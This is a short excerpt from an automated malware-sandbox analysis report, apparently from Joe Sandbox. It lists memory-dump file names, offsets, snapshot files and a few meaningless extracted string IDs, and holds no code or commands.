              • Snapshot File: hcaresult_40_2_7ffd9ba07000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID: /$2$4$w
              • API String ID: 0-3506326225
              Strings
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9B9FF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9FF000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9b9ff000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID: 7$[$k${
              • API String ID: 0-2126227682
              Strings
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9BA07000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA07000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9ba07000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID: M_^9$M_^;$M_^=$M_^?
              • API String ID: 0-1741231188